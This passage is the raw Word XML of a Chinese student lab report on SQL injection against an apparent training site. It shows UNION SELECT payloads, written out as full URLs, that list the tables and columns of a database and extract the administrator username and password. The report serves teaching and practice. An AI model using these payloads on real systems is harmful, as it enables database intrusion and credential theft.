                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>'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maoshe</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB181D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' limit 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</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB181D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>,1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，获得第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个表名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dirs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。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1C810C1C" w14:textId="4AA92D8C" w:rsidR="00EF1454" w:rsidRDefault="00EF1454" w:rsidP="00EF1454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drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2F2AE18B" wp14:editId="4DB5E9F9">
                  <wp:extent cx="3600000" cy="2282101"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="148527036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282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E792BC" w14:textId="54FC3B52" w:rsidR="00EF1454" w:rsidRDefault="00EF1454" w:rsidP="00EF1454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测试</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3E40">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/index.php?id=1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and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=2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union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select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,</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB181D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table_name from information_schema.tables where table_schema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Pr="00AB181D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>=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Pr="00AB181D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>'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maoshe</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB181D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' limit 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2</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB181D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>,1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，获得第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个表名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news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。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="790FD2B7" w14:textId="310090BB" w:rsidR="00EF1454" w:rsidRDefault="00BC23FC" w:rsidP="00EF1454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lastRenderedPageBreak/>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1B82A137" wp14:editId="1481AC26">
                  <wp:extent cx="3600000" cy="2278826"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="154455015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27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A5F04" w14:textId="4B348D00" w:rsidR="00EF1454" w:rsidRPr="00EF1454" w:rsidRDefault="00EF1454" w:rsidP="00EF1454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测试</w:t>
            </w:r>
            <w:r w:rsidRPr="00BF3E40">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/index.php?id=1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and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=2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union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select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,</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB181D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table_name from information_schema.tables where table_schema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Pr="00AB181D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>=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Pr="00AB181D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>'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maoshe</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB181D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' limit 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3</w:t>
            </w:r>
            <w:r w:rsidRPr="00AB181D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>,1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，获得第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个表名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xss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。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="54D9BA1F" w14:textId="3A121E9A" w:rsidR="00EF1454" w:rsidRPr="00EF1454" w:rsidRDefault="00EF1454" w:rsidP="00EF1454">
            <w:pPr>
              <w:pStyle w:val="ab"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="643D963C" wp14:editId="1EC55CB1">
                  <wp:extent cx="3600000" cy="2255925"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="174045234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25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C485C" w14:textId="34713909" w:rsidR="00906BDA" w:rsidRDefault="00EF1454" w:rsidP="00EF1454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故获得的数据库中的</w:t>
            </w:r>
            <w:r w:rsidR="00906BD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表名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: </w:t>
            </w:r>
            <w:r w:rsidR="00906BD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admin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, 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dirs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, </w:t>
            </w:r>
            <w:r w:rsidR="00906BD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news</w:t>
            </w:r>
            <w:bookmarkStart w:id="41" w:name="OLE_LINK3"/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, </w:t>
            </w:r>
            <w:r w:rsidR="00906BD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xss</w:t>
            </w:r>
            <w:bookmarkEnd w:id="41"/>
          </w:p>
          <w:p w14:paraId="2736B605" w14:textId="77777777" w:rsidR="00EF1454" w:rsidRDefault="00EF1454" w:rsidP="00EF1454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  <w:p w14:paraId="656C99A9" w14:textId="04C16091" w:rsidR="00AB181D" w:rsidRPr="00EF1454" w:rsidRDefault="00EF1454" w:rsidP="00AB181D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pPr>
            <w:r w:rsidRPr="00EF1454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8"/>
              </w:rPr>
              <w:t>4.3</w:t>
            </w:r>
            <w:r w:rsidR="00AB181D" w:rsidRPr="00EF1454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8"/>
              </w:rPr>
              <w:t>每个表中的字段数量以及字段名</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7F71EA70" w14:textId="3C5FA563" w:rsidR="00906BDA" w:rsidRDefault="00EF1454" w:rsidP="00EF1454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使用</w:t>
            </w:r>
            <w:r w:rsidR="00906BD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SQL</w:t>
            </w:r>
            <w:r w:rsidR="00906BD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语句：</w:t>
            </w:r>
            <w:r w:rsidR="00906BDA" w:rsidRPr="00906BDA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>select column_name from information_schema.columns where table_schema='</w:t>
            </w:r>
            <w:r w:rsidR="00906BD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maoshe</w:t>
            </w:r>
            <w:r w:rsidR="00906BDA" w:rsidRPr="00906BDA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>' and table_name=</w:t>
            </w:r>
            <w:r w:rsidR="00906BD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'admin</w:t>
            </w:r>
            <w:r w:rsidR="00906BDA" w:rsidRPr="00906BDA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>' limit 0,1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查询数据库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maoshe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中表名为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admin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的第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个</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1454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字段名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。以此类推，查询</w:t>
            </w:r>
            <w:r w:rsidRPr="00EF1454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每个表中的字段数量以及字段名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。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14A4F9EF" w14:textId="6BE291D0" w:rsidR="00906BDA" w:rsidRDefault="00EF1454" w:rsidP="00EF1454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测试</w:t>
            </w:r>
            <w:r w:rsidR="00906BDA" w:rsidRPr="00BF3E40">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/index.php?id=1</w:t>
            </w:r>
            <w:r w:rsidR="00906BD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="00906BDA"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and</w:t>
            </w:r>
            <w:r w:rsidR="00906BD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906BDA"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=2</w:t>
            </w:r>
            <w:r w:rsidR="00906BD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906BDA"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union</w:t>
            </w:r>
            <w:r w:rsidR="00906BD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906BDA"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select</w:t>
            </w:r>
            <w:r w:rsidR="00906BD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906BDA"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,</w:t>
            </w:r>
            <w:r w:rsidR="00906BDA" w:rsidRPr="00AB181D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</w:t>
            </w:r>
            <w:r w:rsidR="00906BDA" w:rsidRPr="00906BDA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>column_name from information_schema.columns where table_schema=</w:t>
            </w:r>
            <w:r w:rsidR="00906BD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="00906BDA" w:rsidRPr="00906BDA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidR="00906BD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maoshe</w:t>
            </w:r>
            <w:r w:rsidR="00906BDA" w:rsidRPr="00906BDA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>' and table_name=</w:t>
            </w:r>
            <w:r w:rsidR="00906BD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'admin</w:t>
            </w:r>
            <w:r w:rsidR="00906BDA" w:rsidRPr="00906BDA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>' limit 0,1</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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，获取数据库</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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maoshe</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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中表名为</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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admin</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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的第</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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个</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E09" w:rsidRPr="00EF1454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字段名</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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Id</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3DC32599" w14:textId="71B4B050" w:rsidR="00FE6E09" w:rsidRDefault="009C5687" w:rsidP="00FE6E09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E92B06" wp14:editId="54E9FFB1">
                  <wp:extent cx="3600000" cy="2296754"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="239161347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296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584AC" w14:textId="6702D9EE" w:rsidR="00FE6E09" w:rsidRDefault="00FE6E09" w:rsidP="00FE6E09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FE6E0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不断重复增加</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE6E0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limit</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE6E0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的偏移量即可得到所有字段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（</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE6E0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之后不再展示截图，对于不同表只需要对应改变表名即可）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。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07359564" w14:textId="67D3BBD8" w:rsidR="00FE6E09" w:rsidRDefault="00FE6E09" w:rsidP="00FE6E09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故最后得到的</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE6E0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每个表中的字段数量以及字段名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：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26FB602A" w14:textId="165FF571" w:rsidR="00906BDA" w:rsidRDefault="003F32EE" w:rsidP="00FE6E09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admin</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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表有</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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3</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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个字段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：</w:t>
            </w:r>
            <w:r w:rsidRPr="003F32EE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>I</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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d, </w:t>
            </w:r>
            <w:r w:rsidRPr="003F32EE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>username</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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, </w:t>
            </w:r>
            <w:r w:rsidRPr="003F32EE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>password</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="64D9B647" w14:textId="7C34E7AC" w:rsidR="003F32EE" w:rsidRDefault="003F32EE" w:rsidP="00FE6E09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dirs</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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表有</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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个字段</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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: </w:t>
            </w:r>
            <w:r w:rsidRPr="003F32EE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>paths</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06AF2E98" w14:textId="27C6927A" w:rsidR="003F32EE" w:rsidRDefault="003F32EE" w:rsidP="00FE6E09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news</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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表有</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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2</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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个字段</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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: </w:t>
            </w:r>
            <w:r w:rsidRPr="003F32EE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>id</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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, </w:t>
            </w:r>
            <w:r w:rsidRPr="003F32EE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>content</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="268F77CB" w14:textId="74B64151" w:rsidR="003F32EE" w:rsidRDefault="003F32EE" w:rsidP="00FE6E09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3F32EE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>xss</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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表有</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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3</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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个字段</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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: 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id</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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user</w:t>
            </w:r>
            <w:r w:rsidR="00FE6E0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pass</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5238CB15" w14:textId="77777777" w:rsidR="00FE6E09" w:rsidRPr="00906BDA" w:rsidRDefault="00FE6E09" w:rsidP="00FE6E09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  <w:p w14:paraId="124FE0BC" w14:textId="03D84461" w:rsidR="00AB181D" w:rsidRPr="00FE6E09" w:rsidRDefault="00FE6E09" w:rsidP="00AB181D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pPr>
            <w:r w:rsidRPr="00FE6E09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8"/>
              </w:rPr>
              <w:t>4.4</w:t>
            </w:r>
            <w:r w:rsidR="00AB181D" w:rsidRPr="00FE6E09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8"/>
              </w:rPr>
              <w:t>管理员用户密码</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="39BBB731" w14:textId="1FFE819E" w:rsidR="009C5687" w:rsidRDefault="00FE6E09" w:rsidP="009C5687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使用</w:t>
            </w:r>
            <w:r w:rsidR="003F32EE" w:rsidRPr="003F32EE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SQL</w:t>
            </w:r>
            <w:r w:rsidR="003F32EE" w:rsidRPr="003F32EE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语句：</w:t>
            </w:r>
            <w:r w:rsidR="003F32EE" w:rsidRPr="003F32EE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select</w:t>
            </w:r>
            <w:r w:rsidR="003F32EE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bookmarkStart w:id="42" w:name="OLE_LINK7"/>
            <w:r w:rsidR="003F32EE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username from maoshe.admin </w:t>
            </w:r>
            <w:r w:rsidR="003F32EE" w:rsidRPr="003F32EE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>limit 0,1</w:t>
            </w:r>
            <w:bookmarkEnd w:id="42"/>
            <w:r w:rsidR="003F32EE" w:rsidRPr="003F32EE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>;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查询数据库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maoshe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中表名为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admin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的第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个用户名</w:t>
            </w:r>
            <w:r w:rsidRPr="003F32EE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>username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。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5C80D2AE" w14:textId="6BE5F82F" w:rsidR="003F32EE" w:rsidRDefault="00FE6E09" w:rsidP="00FE6E09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bookmarkStart w:id="43" w:name="OLE_LINK8"/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测试</w:t>
            </w:r>
            <w:r w:rsidR="003F32EE" w:rsidRPr="00BF3E40">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/index.php?id=1</w:t>
            </w:r>
            <w:r w:rsidR="003F32EE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="003F32EE"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and</w:t>
            </w:r>
            <w:r w:rsidR="003F32E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3F32EE"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=2</w:t>
            </w:r>
            <w:r w:rsidR="003F32E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3F32EE"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union</w:t>
            </w:r>
            <w:r w:rsidR="003F32E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3F32EE"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select</w:t>
            </w:r>
            <w:r w:rsidR="003F32E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3F32EE"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,</w:t>
            </w:r>
            <w:r w:rsidR="003F32E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3F32EE" w:rsidRPr="003F32E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username </w:t>
            </w:r>
            <w:r w:rsidR="003F32EE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from</w:t>
            </w:r>
            <w:r w:rsidR="003F32EE" w:rsidRPr="003F32E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maoshe.admin limit 0,1</w:t>
            </w:r>
            <w:bookmarkEnd w:id="43"/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获取数据库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maoshe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中表名为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admin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的第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个用户名</w:t>
            </w:r>
            <w:r w:rsidRPr="003F32EE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>username</w:t>
            </w:r>
            <w:r w:rsidR="009C5687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为</w:t>
            </w:r>
            <w:r w:rsidR="009C5687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admin</w:t>
            </w:r>
            <w:r w:rsidR="009C5687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。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="629CFD72" w14:textId="1B0928AD" w:rsidR="009C5687" w:rsidRDefault="009C5687" w:rsidP="009C5687">
            <w:pPr>
              <w:ind w:firstLineChars="200" w:firstLine="44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6A409A" wp14:editId="22132E75">
                  <wp:extent cx="3600000" cy="2320219"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="99717353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32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42DE9" w14:textId="0F7E1C8C" w:rsidR="008C0A8D" w:rsidRPr="009C5687" w:rsidRDefault="009C5687" w:rsidP="009C5687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使用</w:t>
            </w:r>
            <w:r w:rsidR="008C0A8D" w:rsidRPr="003F32EE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SQL</w:t>
            </w:r>
            <w:r w:rsidR="008C0A8D" w:rsidRPr="003F32EE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语句：</w:t>
            </w:r>
            <w:r w:rsidR="008C0A8D" w:rsidRPr="003F32EE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select</w:t>
            </w:r>
            <w:r w:rsidR="008C0A8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password from maoshe.admin where username='admin</w:t>
            </w:r>
            <w:r w:rsidR="008C0A8D" w:rsidRPr="00906BDA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidR="008C0A8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="008C0A8D" w:rsidRPr="003F32EE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>limit 0,1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查询数据库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maoshe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中表名为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admin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，用户名</w:t>
            </w:r>
            <w:r w:rsidRPr="003F32EE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>username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为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admin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的密码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password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。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5335EB42" w14:textId="3AF5E6A8" w:rsidR="008C0A8D" w:rsidRDefault="009C5687" w:rsidP="009C5687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测试</w:t>
            </w:r>
            <w:r w:rsidR="008C0A8D" w:rsidRPr="00BF3E40">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>http://pu2lh35s.ia.aqlab.cn/index.php?id=1</w:t>
            </w:r>
            <w:r w:rsidR="008C0A8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="008C0A8D"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and</w:t>
            </w:r>
            <w:r w:rsidR="008C0A8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8C0A8D"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=2</w:t>
            </w:r>
            <w:r w:rsidR="008C0A8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8C0A8D"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union</w:t>
            </w:r>
            <w:r w:rsidR="008C0A8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8C0A8D"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select</w:t>
            </w:r>
            <w:r w:rsidR="008C0A8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8C0A8D" w:rsidRPr="00E85AA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,</w:t>
            </w:r>
            <w:r w:rsidR="008C0A8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8C0A8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password from maoshe.admin where username='admin</w:t>
            </w:r>
            <w:r w:rsidR="008C0A8D" w:rsidRPr="00906BDA">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>'</w:t>
            </w:r>
            <w:r w:rsidR="008C0A8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="008C0A8D" w:rsidRPr="003F32EE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>limit 0,1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获取查询数据库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maoshe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中表名为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admin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，用户名</w:t>
            </w:r>
            <w:r w:rsidRPr="003F32EE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>username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为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admin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的密码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password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为</w:t>
            </w:r>
            <w:r w:rsidRPr="008C0A8D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hellohack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463D670E" w14:textId="288B12CB" w:rsidR="008C0A8D" w:rsidRDefault="009C5687" w:rsidP="009C5687">
            <w:pPr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3D3B51" wp14:editId="10EE53D8">
                  <wp:extent cx="3600000" cy="2338522"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="128702759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338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72CC4E" w14:textId="30445D24" w:rsidR="009C5687" w:rsidRPr="009C5687" w:rsidRDefault="009C5687" w:rsidP="009C5687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FE6E0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不断重复增加</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE6E0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limit</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE6E0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的偏移量即可得到所有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用户名及其密码（</w:t>
            </w:r>
            <w:r w:rsidRPr="00FE6E0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之后不再展示截图）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。</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7B134C7D" w14:textId="30DF0F83" w:rsidR="009C5687" w:rsidRPr="009C5687" w:rsidRDefault="009C5687" w:rsidP="009C5687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故最后得到的管理员用户名及其密码：</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B6395A2" w14:textId="7A91CB9E" w:rsidR="003F32EE" w:rsidRDefault="003F32EE" w:rsidP="009C5687">
            <w:pPr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admin</w:t>
            </w:r>
            <w:r w:rsidR="008C0A8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,</w:t>
            </w:r>
            <w:r w:rsidR="008C0A8D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008C0A8D" w:rsidRPr="008C0A8D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hellohack</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="11325408" w14:textId="5678FD14" w:rsidR="003F32EE" w:rsidRPr="00E85AAE" w:rsidRDefault="003F32EE" w:rsidP="009C5687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3F32EE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ppt</w:t>
            </w:r>
            <w:r w:rsidRPr="003F32EE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领取微信</w:t>
            </w:r>
            <w:r w:rsidR="008C0A8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,</w:t>
            </w:r>
            <w:r w:rsidR="008C0A8D">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="008C0A8D" w:rsidRPr="008C0A8D">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>zkaqbanban</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00443E3E" w14:paraId="62C73E34" w14:textId="77777777" w:rsidTr="001F5C55">
        <w:trPr>
          <w:trHeight w:val="1907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221004DC" w14:textId="5B972E3B" w:rsidR="00F62BC4" w:rsidRDefault="00443E3E" w:rsidP="00443E3E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lastRenderedPageBreak/>
              <w:t>五、实验过程</w:t>
            </w:r>
            <w:r w:rsidR="00DF2E70">
              <w:rPr>
                <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>中</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>遇到的问题</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="黑体"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>及解决</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:eastAsia="黑体" w:hint="eastAsia"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>情况</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12F97EFD" w14:textId="599893E1" w:rsidR="003749BA" w:rsidRDefault="00D92BD0" w:rsidP="00AC260D">
            <w:pPr>
              <w:tabs>
                <w:tab w:val="num" w:pos="1140"/>
              </w:tabs>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:bCs/>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="003F52DE">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                <w:b/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>问题：</w:t>
            </w:r>
            <w:bookmarkStart w:id="44" w:name="OLE_LINK15"/>
